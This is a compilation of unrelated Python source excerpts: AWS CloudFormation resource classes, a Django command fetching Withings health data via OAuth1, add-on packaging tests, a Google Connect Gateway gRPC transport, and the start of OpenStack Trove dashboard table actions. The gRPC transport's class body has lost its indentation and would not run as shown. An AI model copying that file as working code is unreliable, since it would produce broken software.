    """An AWS::EC2::Instance resource."""
    def __init__(self, **kwargs):
        LaunchableResource.__init__(self, "AWS::EC2::Instance", **kwargs)

    @classmethod
    def standalone_from_launchable(cls, launch):
        """
        Given a launchable resource, create a definition of a standalone
        instance, which doesn't depend on or contain references to other
        elements.
        """
        attrs = copy.copy(launch.el_attrs)
        # Remove attributes we overwrite / don't need.
        # ('dict.has_key' was removed in Python 3; pop-with-default is the
        # equivalent of the old check-then-del pairs on both 2 and 3.)
        del attrs["Type"]
        attrs.pop("DependsOn", None)
        # NOTE(review): attrs is a *shallow* copy, so these pops mutate the
        # launchable's own Properties dict as well — identical to the
        # original behaviour, but confirm it is intended.
        attrs["Properties"].pop("SpotPrice", None)
        attrs["Properties"].pop("InstanceMonitoring", None)
        attrs["Properties"].pop("SecurityGroups", None)
        if "InstanceId" in attrs["Properties"]:
            raise RuntimeError("Can't make instance from launchable containing InstanceId property")
        inst = EC2Instance(**attrs)
        # TODO: shallow copy?
        inst.iscm = launch.iscm
        return inst
class EC2LaunchConfiguration(LaunchableResource):
    """An AWS::AutoScaling::LaunchConfiguration resource."""
    def __init__(self, **kwargs):
        LaunchableResource.__init__(self, "AWS::AutoScaling::LaunchConfiguration", **kwargs)
class WaitCondition(Resource):
    """An AWS::CloudFormation::WaitCondition resource."""
    def __init__(self, **kwargs):
        Resource.__init__(self, "AWS::CloudFormation::WaitCondition", **kwargs)
class WaitConditionHandle(Resource):
    """An AWS::CloudFormation::WaitConditionHandle resource."""
    def __init__(self, **kwargs):
        Resource.__init__(self, "AWS::CloudFormation::WaitConditionHandle", **kwargs)
| |
# -*- coding: utf-8 -*-
# pylint: disable=no-member, line-too-long
from builtins import str # pylint: disable=redefined-builtin
import datetime
import json
import os
import time
import arrow
from requests_oauthlib import OAuth1Session
from django.conf import settings
from django.core.management.base import BaseCommand
from django.utils import timezone
from ...decorators import handle_lock
from ...models import DataPoint, install_supports_jsonfield
GENERATOR_NAME = 'pdk-withings-device: Passive Data Kit Server'
class Command(BaseCommand):
    # Despite the generic help text, this command pulls Withings device data
    # for every known source over a date range (defaults: yesterday..today).
    help = 'Compiles data reports requested by end users.'

    def add_arguments(self, parser):
        # Both bounds are optional; handle() fills in the defaults.
        parser.add_argument('--start',
                            type=str,
                            dest='start',
                            help='Start of date range to retrieve Withings data in format YYYY-MM-DD')
        parser.add_argument('--end',
                            type=str,
                            dest='end',
                            help='End of date range to retrieve Withings data in format YYYY-MM-DD')

    @handle_lock
    def handle(self, *args, **options): # pylint: disable=too-many-locals,too-many-branches,too-many-statements
        os.umask(000)
        # Default range: yesterday through today.
        start = options['start']
        if start is None:
            start = (timezone.now() - datetime.timedelta(days=1)).strftime('%Y-%m-%d')
        end = options['end']
        if end is None:
            end = timezone.now().strftime('%Y-%m-%d')
        # Midnight-aligned bounds, converted to the server's timezone.
        start_date = arrow.get(start).replace(hour=0, minute=0, second=0).to(settings.TIME_ZONE)
        end_date = arrow.get(end).replace(hour=0, minute=0, second=0).to(settings.TIME_ZONE)
        sources = DataPoint.objects.order_by('source').values_list('source', flat=True).distinct()
        for source in sources:
            # The latest Withings point for a source carries the OAuth tokens
            # needed to fetch more data for that source.
            data_point = DataPoint.objects.filter(source=source, generator_identifier='pdk-withings-device').order_by('-created').first()
            if data_point is not None:
                properties = data_point.fetch_properties()
                if 'oauth_user_token' in properties and 'oauth_user_secret' in properties and 'oauth_user_id' in properties:
                    # Walk the range one day at a time.
                    index_date = start_date
                    while index_date < end_date:
                        # NOTE(review): replace(days=+1) shifts by a day on
                        # arrow < 1.0; newer arrow requires shift() — confirm
                        # the pinned arrow version before upgrading.
                        next_day = index_date.replace(days=+1)
                        fetch_intraday(source, properties, index_date, next_day)
                        time.sleep(1)  # Throttle Withings API calls.
                        fetch_sleep_measures(source, properties, index_date, next_day)
                        time.sleep(1)
                        index_date = next_day
def fetch_intraday(user_id, properties, start_date, end_date): # pylint: disable=too-many-locals, too-many-statements, too-many-branches
    """
    Fetch intraday activity for one user from the Withings API between
    start_date and end_date (arrow objects) and store each new series entry
    as a DataPoint, skipping timestamps that were already recorded.
    """
    # NOTE(review): '.timestamp' as a property is arrow < 1.0 behaviour
    # (later versions made it a method) — confirm the pinned version.
    api_url = 'https://wbsapi.withings.net/v2/measure?action=getintradayactivity'
    api_url += '&userid=' + properties['oauth_user_id']
    api_url += '&startdate=' + str(start_date.timestamp)
    api_url += '&enddate=' + str(end_date.timestamp)
    # Sign the request with the app credentials plus the user's OAuth1 token.
    oauth = OAuth1Session(settings.PDK_WITHINGS_API_KEY, \
                          client_secret=settings.PDK_WITHINGS_API_SECRET, \
                          resource_owner_key=properties['oauth_user_token'], \
                          resource_owner_secret=properties['oauth_user_secret'],
                          signature_type='query')
    response = oauth.get(url=api_url)
    results = response.json()
    if 'body' in results and 'series' in results['body']:
        if results['body']['series'] == []:
            # An empty result arrives as a list rather than a dict of entries.
            return
        # 'series' maps epoch-second strings to per-slot measurement dicts.
        for timestamp, values in list(results['body']['series'].items()):
            # Skip slots we already stored for this source/timestamp.
            found = False
            created_date = arrow.get(timestamp).datetime
            matches = DataPoint.objects.filter(source=user_id, generator_identifier='pdk-withings-device', created=created_date)
            for match in matches:
                match_props = match.fetch_properties()
                if match_props['datastream'] == 'intraday-activity':
                    found = True
            if found is False:
                now = arrow.utcnow()
                new_point = DataPoint(source=user_id, generator=GENERATOR_NAME, generator_identifier='pdk-withings-device')
                new_point.created = created_date
                new_point.recorded = now.datetime
                new_properties = {}
                new_properties['datastream'] = 'intraday-activity'
                new_properties['activity_start'] = int(timestamp)
                new_properties['activity_duration'] = values['duration']
                # Optional measurements: only present on some entries.
                if 'calories' in values:
                    new_properties['calories'] = values['calories']
                if 'distance' in values:
                    new_properties['distance'] = values['distance']
                if 'steps' in values:
                    new_properties['steps'] = values['steps']
                if 'elevation' in values:
                    new_properties['elevation_climbed'] = values['elevation']
                if 'sleep_state' in values:
                    new_properties['sleep_state'] = values['sleep_state']
                new_properties['observed'] = now.timestamp * 1000  # milliseconds
                new_properties['server_fetched'] = True
                # Tokens are carried on every point so later runs can reuse them.
                new_properties['oauth_user_token'] = properties['oauth_user_token']
                new_properties['oauth_user_secret'] = properties['oauth_user_secret']
                new_properties['oauth_user_id'] = properties['oauth_user_id']
                pdk_metadata = {}
                pdk_metadata['source'] = user_id
                pdk_metadata['generator-id'] = 'pdk-withings-device'
                pdk_metadata['generator'] = GENERATOR_NAME
                pdk_metadata['timestamp'] = now.timestamp
                new_properties['passive-data-metadata'] = pdk_metadata
                # Older installs store properties as a serialized JSON string.
                if install_supports_jsonfield():
                    new_point.properties = new_properties
                else:
                    new_point.properties = json.dumps(new_properties, indent=2)
                new_point.fetch_secondary_identifier()
                new_point.save()
def fetch_sleep_measures(user_id, properties, start_date, end_date): # pylint: disable=too-many-locals, too-many-statements, too-many-branches
    """
    Fetch sleep measures for one user from the Withings API between
    start_date and end_date (arrow objects) and store each new series item
    as a DataPoint, skipping items that were already recorded.
    """
    api_url = 'https://wbsapi.withings.net/v2/sleep?action=get'
    api_url += '&userid=' + properties['oauth_user_id']
    api_url += '&startdate=' + str(start_date.timestamp)
    api_url += '&enddate=' + str(end_date.timestamp)
    # Sign the request with the app credentials plus the user's OAuth1 token.
    oauth = OAuth1Session(settings.PDK_WITHINGS_API_KEY, \
                          client_secret=settings.PDK_WITHINGS_API_SECRET, \
                          resource_owner_key=properties['oauth_user_token'], \
                          resource_owner_secret=properties['oauth_user_secret'],
                          signature_type='query')
    response = oauth.get(url=api_url)
    results = response.json()
    if 'body' in results and 'series' in results['body']:
        if results['body']['series'] == []:
            return
        for item in results['body']['series']:
            # Skip items we already stored (matched by end time + start time).
            found = False
            created_date = arrow.get(item['enddate']).datetime
            matches = DataPoint.objects.filter(source=user_id, generator_identifier='pdk-withings-device', created=created_date)
            for match in matches:
                match_props = match.fetch_properties()
                if match_props['datastream'] == 'sleep-measures' and match_props['start_date'] == item['startdate']:
                    found = True
            if found is False:
                now = arrow.utcnow()
                new_point = DataPoint(source=user_id, generator=GENERATOR_NAME, generator_identifier='pdk-withings-device')
                new_point.created = created_date
                new_point.recorded = now.datetime
                new_properties = {}
                new_properties['datastream'] = 'sleep-measures'
                new_properties['start_date'] = item['startdate']
                # BUG FIX: 'end_date' was copied from item['startdate'];
                # the item's end timestamp lives in item['enddate'] (the same
                # field used for created_date above).
                new_properties['end_date'] = item['enddate']
                # Withings encodes the sleep phase as a small integer.
                if item['state'] == 0:
                    new_properties['state'] = 'awake'
                elif item['state'] == 1:
                    new_properties['state'] = 'light-sleep'
                elif item['state'] == 2:
                    new_properties['state'] = 'deep-sleep'
                elif item['state'] == 3:
                    new_properties['state'] = 'rem-sleep'
                else:
                    new_properties['state'] = 'unknown'
                # Model 32 is the Aura sleep system; 16 is an activity tracker.
                if results['body']['model'] == 32:
                    new_properties['measurement_device'] = 'aura'
                elif results['body']['model'] == 16:
                    new_properties['measurement_device'] = 'activity-tracker'
                else:
                    new_properties['measurement_device'] = 'unknown'
                new_properties['observed'] = now.timestamp * 1000  # milliseconds
                new_properties['server_fetched'] = True
                # Tokens are carried on every point so later runs can reuse them.
                new_properties['oauth_user_token'] = properties['oauth_user_token']
                new_properties['oauth_user_secret'] = properties['oauth_user_secret']
                new_properties['oauth_user_id'] = properties['oauth_user_id']
                pdk_metadata = {}
                pdk_metadata['source'] = user_id
                pdk_metadata['generator-id'] = 'pdk-withings-device'
                pdk_metadata['generator'] = GENERATOR_NAME
                pdk_metadata['timestamp'] = now.timestamp
                new_properties['passive-data-metadata'] = pdk_metadata
                # Older installs store properties as a serialized JSON string.
                if install_supports_jsonfield():
                    new_point.properties = new_properties
                else:
                    new_point.properties = json.dumps(new_properties, indent=2)
                new_point.fetch_secondary_identifier()
                new_point.save()
| |
import json
from contextlib import contextmanager
from tempfile import NamedTemporaryFile
import pytest
from nose.tools import eq_
import amo
import amo.tests
from addons.models import Addon
from applications.models import AppVersion
from files.models import File
from files.utils import find_jetpacks, is_beta, PackageJSONExtractor
from versions.models import Version
pytestmark = pytest.mark.django_db
def test_is_beta():
    """is_beta() accepts every conventional pre-release marker (with or
    without separators and trailing digits) and rejects plain versions."""
    assert not is_beta('1.2')
    for marker in ('a', 'alpha', 'b', 'beta', 'pre', 'rc'):
        for suffix in ('', '1', '123', '.1', '.123', '-1', '-123'):
            assert is_beta('1.2' + marker + suffix)
class TestFindJetpacks(amo.tests.TestCase):
    """Exercises find_jetpacks() against the base addon fixture."""
    fixtures = ['base/addon_3615']

    def setUp(self):
        super(TestFindJetpacks, self).setUp()
        # Mark every fixture file as a jetpack at version 1.0.
        File.objects.update(jetpack_version='1.0')
        self.file = File.objects.filter(version__addon=3615).get()

    def test_success(self):
        files = find_jetpacks('1.0', '1.1')
        eq_(files, [self.file])

    def test_skip_autorepackage(self):
        # Add-ons that opted out of auto repackaging are excluded entirely.
        Addon.objects.update(auto_repackage=False)
        eq_(find_jetpacks('1.0', '1.1'), [])

    def test_minver(self):
        # Files below the minimum version are returned but not upgradeable.
        files = find_jetpacks('1.1', '1.2')
        eq_(files, [self.file])
        eq_(files[0].needs_upgrade, False)

    def test_maxver(self):
        # Files above the maximum version are returned but not upgradeable.
        files = find_jetpacks('.1', '1.0')
        eq_(files, [self.file])
        eq_(files[0].needs_upgrade, False)

    def test_unreviewed_files_plus_reviewed_file(self):
        # We upgrade unreviewed files up to the latest reviewed file.
        v = Version.objects.create(addon_id=3615)
        new_file = File.objects.create(version=v, jetpack_version='1.0')
        # NOTE(review): the Version created on the next line is discarded and
        # new_file2 attaches to the same version 'v' — possibly intended to
        # be 'v = Version.objects.create(...)'; confirm before changing.
        Version.objects.create(addon_id=3615)
        new_file2 = File.objects.create(version=v, jetpack_version='1.0')
        eq_(new_file.status, amo.STATUS_UNREVIEWED)
        eq_(new_file2.status, amo.STATUS_UNREVIEWED)
        files = find_jetpacks('1.0', '1.1')
        eq_(files, [self.file, new_file, new_file2])
        assert all(f.needs_upgrade for f in files)
        # Now self.file will not need an upgrade since we skip old versions.
        new_file.update(status=amo.STATUS_PUBLIC)
        files = find_jetpacks('1.0', '1.1')
        eq_(files, [self.file, new_file, new_file2])
        eq_(files[0].needs_upgrade, False)
        assert all(f.needs_upgrade for f in files[1:])

    def test_ignore_non_builder_jetpacks(self):
        # Without a builder_version, nothing matches when filtering by builder.
        File.objects.update(builder_version=None)
        files = find_jetpacks('.1', '1.0', from_builder_only=True)
        eq_(files, [])

    def test_find_builder_jetpacks_only(self):
        File.objects.update(builder_version='2.0.1')
        files = find_jetpacks('.1', '1.0', from_builder_only=True)
        eq_(files, [self.file])
class TestPackageJSONExtractor(amo.tests.TestCase):
    """Checks how PackageJSONExtractor maps package.json fields onto the
    add-on metadata dict returned by parse()."""

    @contextmanager
    def extractor(self, base_data):
        # The extractor reads from a path, so write the JSON to a real
        # temporary file first.  NOTE(review): NamedTemporaryFile defaults to
        # binary mode, so this write is Python-2-only as written — confirm
        # before porting to Python 3.
        with NamedTemporaryFile() as f:
            f.write(json.dumps(base_data))
            f.flush()
            yield PackageJSONExtractor(f.name)

    def create_appversion(self, name, version):
        # Register an AppVersion row so engine ranges can resolve against it.
        return AppVersion.objects.create(application=amo.APPS[name].id,
                                         version=version)

    def test_guid(self):
        """Use id for the guid."""
        with self.extractor({'id': 'some-id'}) as extractor:
            eq_(extractor.parse()['guid'], 'some-id')

    def test_name_for_guid_if_no_id(self):
        """Use the name for the guid if there is no id."""
        with self.extractor({'name': 'addon-name'}) as extractor:
            eq_(extractor.parse()['guid'], 'addon-name')

    def test_type(self):
        """Package.json addons are always ADDON_EXTENSION."""
        with self.extractor({}) as extractor:
            eq_(extractor.parse()['type'], amo.ADDON_EXTENSION)

    def test_no_restart(self):
        """Package.json addons are always no-restart."""
        with self.extractor({}) as extractor:
            eq_(extractor.parse()['no_restart'], True)

    def test_name_from_title_with_name(self):
        """Use the title for the name."""
        data = {'title': 'The Addon Title', 'name': 'the-addon-name'}
        with self.extractor(data) as extractor:
            eq_(extractor.parse()['name'], 'The Addon Title')

    def test_name_from_name_without_title(self):
        """Use the name for the name if there is no title."""
        with self.extractor({'name': 'the-addon-name'}) as extractor:
            eq_(extractor.parse()['name'], 'the-addon-name')

    def test_version(self):
        """Use version for the version."""
        with self.extractor({'version': '23.0.1'}) as extractor:
            eq_(extractor.parse()['version'], '23.0.1')

    def test_homepage(self):
        """Use homepage for the homepage."""
        with self.extractor({'homepage': 'http://my-addon.org'}) as extractor:
            eq_(extractor.parse()['homepage'], 'http://my-addon.org')

    def test_summary(self):
        """Use description for the summary."""
        with self.extractor({'description': 'An addon.'}) as extractor:
            eq_(extractor.parse()['summary'], 'An addon.')

    def test_apps(self):
        """Use engines for apps."""
        firefox_version = self.create_appversion('firefox', '33.0a1')
        thunderbird_version = self.create_appversion('thunderbird', '33.0a1')
        data = {
            'engines': {
                'firefox': '>=33.0a1',
                'thunderbird': '>=33.0a1',
            },
        }
        with self.extractor(data) as extractor:
            apps = extractor.parse()['apps']
            apps_dict = dict((app.appdata.short, app) for app in apps)
            assert sorted(apps_dict.keys()) == ['firefox', 'thunderbird']
            # The single '>=33.0a1' bound is used for both min and max.
            assert apps_dict['firefox'].min == firefox_version
            assert apps_dict['firefox'].max == firefox_version
            assert apps_dict['thunderbird'].min == thunderbird_version
            assert apps_dict['thunderbird'].max == thunderbird_version

    def test_unknown_apps_are_ignored(self):
        """Unknown engines get ignored."""
        self.create_appversion('firefox', '33.0a1')
        self.create_appversion('thunderbird', '33.0a1')
        data = {
            'engines': {
                'firefox': '>=33.0a1',
                'thunderbird': '>=33.0a1',
                'node': '>=0.10',
            },
        }
        with self.extractor(data) as extractor:
            apps = extractor.parse()['apps']
            engines = [app.appdata.short for app in apps]
            assert sorted(engines) == ['firefox', 'thunderbird']  # Not node.

    def test_invalid_app_versions_are_ignored(self):
        """Valid engines with invalid versions are ignored."""
        # No 'android' AppVersion row exists, so 'fennec' cannot resolve.
        firefox_version = self.create_appversion('firefox', '33.0a1')
        data = {
            'engines': {
                'firefox': '>=33.0a1',
                'fennec': '>=33.0a1',
            },
        }
        with self.extractor(data) as extractor:
            apps = extractor.parse()['apps']
            eq_(len(apps), 1)
            eq_(apps[0].appdata.short, 'firefox')
            eq_(apps[0].min, firefox_version)
            eq_(apps[0].max, firefox_version)

    def test_fennec_is_treated_as_android(self):
        """Treat the fennec engine as android."""
        android_version = self.create_appversion('android', '33.0a1')
        data = {
            'engines': {
                'fennec': '>=33.0a1',
                'node': '>=0.10',
            },
        }
        with self.extractor(data) as extractor:
            apps = extractor.parse()['apps']
            eq_(apps[0].appdata.short, 'android')
            eq_(apps[0].min, android_version)
            eq_(apps[0].max, android_version)
| |
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Awaitable, Callable, Dict, Optional, Sequence, Tuple, Union
from google.api_core import gapic_v1
from google.api_core import grpc_helpers_async
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import grpc # type: ignore
from grpc.experimental import aio # type: ignore
from google.api import httpbody_pb2 # type: ignore
from .base import GatewayServiceTransport, DEFAULT_CLIENT_INFO
from .grpc import GatewayServiceGrpcTransport
class GatewayServiceGrpcAsyncIOTransport(GatewayServiceTransport):
"""gRPC AsyncIO backend transport for GatewayService.
Gateway service is a public API which works as a Kubernetes
resource model proxy between end users and registered Kubernetes
clusters. Each RPC in this service matches with an HTTP verb.
End user will initiate kubectl commands against the Gateway
service, and Gateway service will forward user requests to
clusters.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
_grpc_channel: aio.Channel
_stubs: Dict[str, Callable] = {}
    @classmethod
    def create_channel(
        cls,
        host: str = "connectgateway.googleapis.com",
        credentials: ga_credentials.Credentials = None,
        credentials_file: Optional[str] = None,
        scopes: Optional[Sequence[str]] = None,
        quota_project_id: Optional[str] = None,
        **kwargs,
    ) -> aio.Channel:
        """Create and return a gRPC AsyncIO channel object.

        Args:
            host (Optional[str]): The host for the channel to use.
            credentials (Optional[~.Credentials]): The
                authorization credentials to attach to requests. These
                credentials identify this application to the service. If
                none are specified, the client will attempt to ascertain
                the credentials from the environment.
            credentials_file (Optional[str]): A file with credentials that can
                be loaded with :func:`google.auth.load_credentials_from_file`.
                Mutually exclusive with ``credentials``.
            scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
                service. These are only used when credentials are not specified and
                are passed to :func:`google.auth.default`.
            quota_project_id (Optional[str]): An optional project to use for billing
                and quota.
            kwargs (Optional[dict]): Keyword arguments, which are passed to the
                channel creation.
        Returns:
            aio.Channel: A gRPC AsyncIO channel object.
        """
        # Service-default scopes/host are applied when the caller passes none.
        return grpc_helpers_async.create_channel(
            host,
            credentials=credentials,
            credentials_file=credentials_file,
            quota_project_id=quota_project_id,
            default_scopes=cls.AUTH_SCOPES,
            scopes=scopes,
            default_host=cls.DEFAULT_HOST,
            **kwargs,
        )
def __init__(
    self,
    *,
    host: str = "connectgateway.googleapis.com",
    credentials: Optional[ga_credentials.Credentials] = None,
    credentials_file: Optional[str] = None,
    scopes: Optional[Sequence[str]] = None,
    channel: Optional[aio.Channel] = None,
    api_mtls_endpoint: Optional[str] = None,
    client_cert_source: Optional[Callable[[], Tuple[bytes, bytes]]] = None,
    ssl_channel_credentials: Optional[grpc.ChannelCredentials] = None,
    client_cert_source_for_mtls: Optional[Callable[[], Tuple[bytes, bytes]]] = None,
    quota_project_id: Optional[str] = None,
    client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
    always_use_jwt_access: Optional[bool] = False,
) -> None:
    """Instantiate the transport.

    Args:
        host (Optional[str]):
            The hostname to connect to.
        credentials (Optional[google.auth.credentials.Credentials]): The
            authorization credentials to attach to requests. These
            credentials identify the application to the service; if none
            are specified, the client will attempt to ascertain the
            credentials from the environment.
            This argument is ignored if ``channel`` is provided.
        credentials_file (Optional[str]): A file with credentials that can
            be loaded with :func:`google.auth.load_credentials_from_file`.
            This argument is ignored if ``channel`` is provided.
        scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
            service. These are only used when credentials are not specified and
            are passed to :func:`google.auth.default`.
        channel (Optional[aio.Channel]): A ``Channel`` instance through
            which to make calls.
        api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
            If provided, it overrides the ``host`` argument and tries to create
            a mutual TLS channel with client SSL credentials from
            ``client_cert_source`` or application default SSL credentials.
        client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
            Deprecated. A callback to provide client SSL certificate bytes and
            private key bytes, both in PEM format. It is ignored if
            ``api_mtls_endpoint`` is None.
        ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
            for the grpc channel. It is ignored if ``channel`` is provided.
        client_cert_source_for_mtls (Optional[Callable[[], Tuple[bytes, bytes]]]):
            A callback to provide client certificate bytes and private key bytes,
            both in PEM format. It is used to configure a mutual TLS channel. It is
            ignored if ``channel`` or ``ssl_channel_credentials`` is provided.
        quota_project_id (Optional[str]): An optional project to use for billing
            and quota.
        client_info (google.api_core.gapic_v1.client_info.ClientInfo):
            The client info used to send a user-agent string along with
            API requests. If ``None``, then default info will be used.
            Generally, you only need to set this if you're developing
            your own client library.
        always_use_jwt_access (Optional[bool]): Whether self signed JWT should
            be used for service account credentials.

    Raises:
        google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport
            creation failed for any reason.
        google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
            and ``credentials_file`` are passed.
    """
    self._grpc_channel = None
    self._ssl_channel_credentials = ssl_channel_credentials
    # Cache of per-RPC stub callables, lazily filled by the properties below.
    self._stubs: Dict[str, Callable] = {}

    if api_mtls_endpoint:
        warnings.warn("api_mtls_endpoint is deprecated", DeprecationWarning)
    if client_cert_source:
        warnings.warn("client_cert_source is deprecated", DeprecationWarning)

    if channel:
        # Ignore credentials if a channel was passed.
        credentials = False
        # If a channel was explicitly provided, set it.
        self._grpc_channel = channel
        self._ssl_channel_credentials = None
    else:
        # No channel given: decide which SSL credentials to use.  The
        # deprecated ``api_mtls_endpoint`` path takes precedence over the
        # newer ``client_cert_source_for_mtls`` path.
        if api_mtls_endpoint:
            host = api_mtls_endpoint

            # Create SSL credentials with client_cert_source or application
            # default SSL credentials.
            if client_cert_source:
                cert, key = client_cert_source()
                self._ssl_channel_credentials = grpc.ssl_channel_credentials(
                    certificate_chain=cert, private_key=key
                )
            else:
                self._ssl_channel_credentials = SslCredentials().ssl_credentials
        else:
            if client_cert_source_for_mtls and not ssl_channel_credentials:
                cert, key = client_cert_source_for_mtls()
                self._ssl_channel_credentials = grpc.ssl_channel_credentials(
                    certificate_chain=cert, private_key=key
                )

    # The base transport sets the host, credentials and scopes
    super().__init__(
        host=host,
        credentials=credentials,
        credentials_file=credentials_file,
        scopes=scopes,
        quota_project_id=quota_project_id,
        client_info=client_info,
        always_use_jwt_access=always_use_jwt_access,
    )

    if not self._grpc_channel:
        self._grpc_channel = type(self).create_channel(
            self._host,
            # use the credentials which are saved
            credentials=self._credentials,
            # Set ``credentials_file`` to ``None`` here as
            # the credentials that we saved earlier should be used.
            credentials_file=None,
            scopes=self._scopes,
            ssl_credentials=self._ssl_channel_credentials,
            quota_project_id=quota_project_id,
            options=[
                ("grpc.max_send_message_length", -1),
                ("grpc.max_receive_message_length", -1),
            ],
        )

    # Wrap messages. This must be done after self._grpc_channel exists
    self._prep_wrapped_messages(client_info)
@property
def grpc_channel(self) -> aio.Channel:
    """Return the channel used by this transport.

    The channel is created once during ``__init__`` and cached on the
    instance, so repeated accesses yield the same object.
    """
    return self._grpc_channel
@property
def get_resource(
    self,
) -> Callable[[httpbody_pb2.HttpBody], Awaitable[httpbody_pb2.HttpBody]]:
    r"""Return a callable for the get resource method over gRPC.

    GetResource performs an HTTP GET request on the
    Kubernetes API Server.

    Returns:
        Callable[[~.HttpBody],
            Awaitable[~.HttpBody]]:
        A function that, when called, will call the underlying RPC
        on the server.
    """
    # Build the stub lazily and cache it; gRPC handles the (de)serialization,
    # so only the serializer/deserializer functions need to be supplied.
    stub = self._stubs.get("get_resource")
    if stub is None:
        stub = self.grpc_channel.unary_unary(
            "/google.cloud.gkeconnect.gateway.v1beta1.GatewayService/GetResource",
            request_serializer=httpbody_pb2.HttpBody.SerializeToString,
            response_deserializer=httpbody_pb2.HttpBody.FromString,
        )
        self._stubs["get_resource"] = stub
    return stub
@property
def post_resource(
    self,
) -> Callable[[httpbody_pb2.HttpBody], Awaitable[httpbody_pb2.HttpBody]]:
    r"""Return a callable for the post resource method over gRPC.

    PostResource performs an HTTP POST on the Kubernetes
    API Server.

    Returns:
        Callable[[~.HttpBody],
            Awaitable[~.HttpBody]]:
        A function that, when called, will call the underlying RPC
        on the server.
    """
    # Build the stub lazily and cache it; gRPC handles the (de)serialization,
    # so only the serializer/deserializer functions need to be supplied.
    stub = self._stubs.get("post_resource")
    if stub is None:
        stub = self.grpc_channel.unary_unary(
            "/google.cloud.gkeconnect.gateway.v1beta1.GatewayService/PostResource",
            request_serializer=httpbody_pb2.HttpBody.SerializeToString,
            response_deserializer=httpbody_pb2.HttpBody.FromString,
        )
        self._stubs["post_resource"] = stub
    return stub
@property
def delete_resource(
    self,
) -> Callable[[httpbody_pb2.HttpBody], Awaitable[httpbody_pb2.HttpBody]]:
    r"""Return a callable for the delete resource method over gRPC.

    DeleteResource performs an HTTP DELETE on the
    Kubernetes API Server.

    Returns:
        Callable[[~.HttpBody],
            Awaitable[~.HttpBody]]:
        A function that, when called, will call the underlying RPC
        on the server.
    """
    # Build the stub lazily and cache it; gRPC handles the (de)serialization,
    # so only the serializer/deserializer functions need to be supplied.
    stub = self._stubs.get("delete_resource")
    if stub is None:
        stub = self.grpc_channel.unary_unary(
            "/google.cloud.gkeconnect.gateway.v1beta1.GatewayService/DeleteResource",
            request_serializer=httpbody_pb2.HttpBody.SerializeToString,
            response_deserializer=httpbody_pb2.HttpBody.FromString,
        )
        self._stubs["delete_resource"] = stub
    return stub
@property
def put_resource(
    self,
) -> Callable[[httpbody_pb2.HttpBody], Awaitable[httpbody_pb2.HttpBody]]:
    r"""Return a callable for the put resource method over gRPC.

    PutResource performs an HTTP PUT on the Kubernetes
    API Server.

    Returns:
        Callable[[~.HttpBody],
            Awaitable[~.HttpBody]]:
        A function that, when called, will call the underlying RPC
        on the server.
    """
    # Build the stub lazily and cache it; gRPC handles the (de)serialization,
    # so only the serializer/deserializer functions need to be supplied.
    stub = self._stubs.get("put_resource")
    if stub is None:
        stub = self.grpc_channel.unary_unary(
            "/google.cloud.gkeconnect.gateway.v1beta1.GatewayService/PutResource",
            request_serializer=httpbody_pb2.HttpBody.SerializeToString,
            response_deserializer=httpbody_pb2.HttpBody.FromString,
        )
        self._stubs["put_resource"] = stub
    return stub
@property
def patch_resource(
    self,
) -> Callable[[httpbody_pb2.HttpBody], Awaitable[httpbody_pb2.HttpBody]]:
    r"""Return a callable for the patch resource method over gRPC.

    PatchResource performs an HTTP PATCH on the
    Kubernetes API Server.

    Returns:
        Callable[[~.HttpBody],
            Awaitable[~.HttpBody]]:
        A function that, when called, will call the underlying RPC
        on the server.
    """
    # Build the stub lazily and cache it; gRPC handles the (de)serialization,
    # so only the serializer/deserializer functions need to be supplied.
    stub = self._stubs.get("patch_resource")
    if stub is None:
        stub = self.grpc_channel.unary_unary(
            "/google.cloud.gkeconnect.gateway.v1beta1.GatewayService/PatchResource",
            request_serializer=httpbody_pb2.HttpBody.SerializeToString,
            response_deserializer=httpbody_pb2.HttpBody.FromString,
        )
        self._stubs["patch_resource"] = stub
    return stub
def close(self):
    """Close the transport's gRPC channel, releasing its resources."""
    channel = self.grpc_channel
    return channel.close()
__all__ = ("GatewayServiceGrpcAsyncIOTransport",)
| |
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.core import urlresolvers
from django.template import defaultfilters as d_filters
from django.utils.translation import pgettext_lazy
from django.utils.translation import ugettext_lazy as _
from django.utils.translation import ungettext_lazy
from horizon import exceptions
from horizon import messages
from horizon import tables
from horizon.templatetags import sizeformat
from horizon.utils import filters
from openstack_dashboard.contrib.trove import api
from openstack_dashboard.contrib.trove.content.database_backups \
import tables as backup_tables
ACTIVE_STATES = ("ACTIVE",)
class DeleteInstance(tables.BatchAction):
    """Batch action scheduling deletion of database instances."""

    name = "delete"
    classes = ("btn-danger",)
    icon = "remove"
    help_text = _("Deleted instances are not recoverable.")

    @staticmethod
    def action_present(count):
        return ungettext_lazy(u"Delete Instance", u"Delete Instances", count)

    @staticmethod
    def action_past(count):
        return ungettext_lazy(
            u"Scheduled deletion of Instance",
            u"Scheduled deletion of Instances",
            count,
        )

    def action(self, request, obj_id):
        api.trove.instance_delete(request, obj_id)
class RestartInstance(tables.BatchAction):
    """Batch action restarting database instances."""

    name = "restart"
